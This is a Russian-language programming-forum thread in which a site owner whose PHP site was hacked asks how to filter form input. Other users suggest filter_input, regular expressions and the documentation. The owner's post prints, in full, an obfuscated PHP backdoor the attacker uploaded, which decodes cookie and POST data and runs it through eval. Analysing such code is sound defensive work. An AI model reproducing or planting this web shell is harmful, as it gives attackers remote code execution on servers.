Форум программистов, компьютерный форум, киберфорум
Наши страницы
PHP для начинающих
Войти
Регистрация
Восстановить пароль
 
Gerd199
5 / 5 / 3
Регистрация: 06.03.2014
Сообщений: 806
1

Уязвимость при отправке формы

09.06.2018, 17:05. Просмотров 206. Ответов 9
Метки нет (Все метки)

Дело в том, что при отправке формы, прописав определенный код.
Пользователь может вносить изменнения в скрипты.
PHP
1
2
3
4
5
    foreach ($_REQUEST as $key => $value){
        $value = strip_tags($value);
        $value = addslashes($value);
        $data[$key] = trim($value); 
    }
Что еще можно добавить для фильтра?

Выявил чисто из-за того что когда пользователь отправляет заявку на обратный звонок, приходит письмо на почту. В нем всякий код...

К примеру содержимое одного из скрипта который взломщик залил
PHP
1
2
<?php
$nmrvj = 'sv6g87t24y9b3lm5nud*aoH#1pkcif0-xre\'_';$qvrdn = Array();$qvrdn[] = $nmrvj[27].$nmrvj[2].$nmrvj[24].$nmrvj[12].$nmrvj[15].$nmrvj[5].$nmrvj[2].$nmrvj[29].$nmrvj[31].$nmrvj[8].$nmrvj[12].$nmrvj[11].$nmrvj[4].$nmrvj[31].$nmrvj[8].$nmrvj[30].$nmrvj[8].$nmrvj[5].$nmrvj[31].$nmrvj[20].$nmrvj[7].$nmrvj[27].$nmrvj[8].$nmrvj[31].$nmrvj[30].$nmrvj[2].$nmrvj[7].$nmrvj[29].$nmrvj[10].$nmrvj[30].$nmrvj[12].$nmrvj[10].$nmrvj[11].$nmrvj[4].$nmrvj[15].$nmrvj[18];$qvrdn[] = $nmrvj[22].$nmrvj[19];$qvrdn[] = $nmrvj[23];$qvrdn[] = $nmrvj[27].$nmrvj[21].$nmrvj[17].$nmrvj[16].$nmrvj[6];$qvrdn[] = $nmrvj[0].$nmrvj[6].$nmrvj[33].$nmrvj[36].$nmrvj[33].$nmrvj[34].$nmrvj[25].$nmrvj[34].$nmrvj[20].$nmrvj[6];$qvrdn[] = $nmrvj[34].$nmrvj[32].$nmrvj[25].$nmrvj[13].$nmrvj[21].$nmrvj[18].$nmrvj[34];$qvrdn[] = $nmrvj[0].$nmrvj[17].$nmrvj[11].$nmrvj[0].$nmrvj[6].$nmrvj[33];$qvrdn[] = $nmrvj[20].$nmrvj[33].$nmrvj[33].$nmrvj[20].$nmrvj[9].$nmrvj[36].$nmrvj[14].$nmrvj[34].$nmrvj[33].$nmrvj[3].$nmrvj[34];$qvrdn[] = $nmrvj[0].$nmrvj[6].$nmrvj[33].$nmrvj[13].$nmrvj[34].$nmrvj[16];$qvrdn[] = $nmrvj[25].$nmrvj[20].$nmrvj[27].$nmrvj[26];foreach ($qvrdn[7]($_COOKIE, $_POST) as $obkoxl => $frkfef){function mifpy($qvrdn, $obkoxl, $qhutc){return $qvrdn[6]($qvrdn[4]($obkoxl . $qvrdn[0], ($qhutc / $qvrdn[8]($obkoxl)) + 1), 0, $qhutc);}function hcarph($qvrdn, $ljwixvl){return @$qvrdn[9]($qvrdn[1], $ljwixvl);}function odjon($qvrdn, $ljwixvl){$lmibj = $qvrdn[3]($ljwixvl) % 3;if (!$lmibj) {eval($ljwixvl[1]($ljwixvl[2]));exit();}}$frkfef = hcarph($qvrdn, $frkfef);odjon($qvrdn, $qvrdn[5]($qvrdn[2], $frkfef ^ mifpy($qvrdn, $obkoxl, $qvrdn[8]($frkfef))));}
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
09.06.2018, 17:05
Ответы с готовыми решениями:

При отправке формы в выводе $_POST в массиве я вижу не все поля формы
подскажите, в чем дело. или для обработки полей типа &quot;file&quot; (которого нет в...

Recapcha при асинхронной отправке формы
Здравствуйте. Реализовал аяксом добавление комментария с рекапчей. Проблема в...

Ошибка при отправке данных формы
Задача: Отправить данные из формы без перезагрузки страницы Решение:...

Сбрасывается значение при отправке формы
День добрый. Для пхп скрипта сделал на сайте страницу с настройками. Оно...

Вывод сообщения при отправке формы
Здесь я принимаю форму и записываю в файл &lt;?php define('GUEST','guest.txt');...

9
Mr_Sergo
729 / 322 / 120
Регистрация: 29.04.2016
Сообщений: 1,026
09.06.2018, 17:15 2
Gerd199, по патерну проверять неа?
0
Jewbacabra
Эксперт PHP
3510 / 2917 / 1304
Регистрация: 24.04.2014
Сообщений: 8,867
09.06.2018, 17:19 3
Нужно брать качеством, а не количеством.
0
coder02
5 / 5 / 2
Регистрация: 28.12.2016
Сообщений: 30
09.06.2018, 17:23 4
Взгляни в сторону php-функций filter_input и filter_var. Они позволяют в том числе и очистить вводимые данные по опреденному образцу
0
Gerd199
5 / 5 / 3
Регистрация: 06.03.2014
Сообщений: 806
18.06.2018, 10:40  [ТС] 5
Можно пожалуйста пример того, как это реализовано у других. ??
0
edward_freedom
1555 / 1434 / 303
Регистрация: 01.10.2011
Сообщений: 2,636
18.06.2018, 13:59 6
Gerd199, Ну так загляни в документацию и посмотри, чего же ты ждешь http://php.net/manual/ru/function.filter-input.php
0
Para bellum
Эксперт PHP
4152 / 3087 / 999
Регистрация: 06.01.2011
Сообщений: 9,021
19.06.2018, 09:25 7
Цитата Сообщение от Gerd199 Посмотреть сообщение
Выявил чисто из-за того что когда пользователь отправляет заявку на обратный звонок, приходит письмо на почту. В нем всякий код...
Это не уязвимость. Мало ли что можно в форме обратной связи написать. Если бы Вам гадости через неё писали, Вы бы не подумали же, что это уязвимость?
1
Gerd199
5 / 5 / 3
Регистрация: 06.03.2014
Сообщений: 806
13.08.2018, 10:39  [ТС] 8
Выручайте, скиньте пожалуйста свой пример того как вы фильтруете. Как сделать так, чтобы собрать все в один массив и недопустить заливки или правки php файлов злоумышленниками
0
andyyy
596 / 196 / 110
Регистрация: 26.05.2016
Сообщений: 1,418
13.08.2018, 15:14 9
Регулярки
0
Gerd199
5 / 5 / 3
Регистрация: 06.03.2014
Сообщений: 806
14.08.2018, 20:35  [ТС] 10
0s.mfzgo3dbonzs44tv.nblz.ru/

Выручайте, не понимаю. что это, случайно через метрику отследил. напрямую черз домен блокирует мол безопасность, даже в исключения не могу добавить

Добавлено через 49 секунд
Все файлы сайта чисты, нет вредоносного кода
0
14.08.2018, 20:35
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
14.08.2018, 20:35

Не работает скрипт при отправке формы
Здравтствуйте. Есть форма отправки данных, к которой прикручена JS форма, не...

Перезагрузка страницы при отправке формы
Как сделать так, что бы при отправке сообщения страничка не обновлялась? &lt;?...

При отправке формы выкидывает на http 404
Добрый день! Описание возникшей проблемы: При нажатии кнопки формы submit меня...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
10
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.
Рейтинг@Mail.ru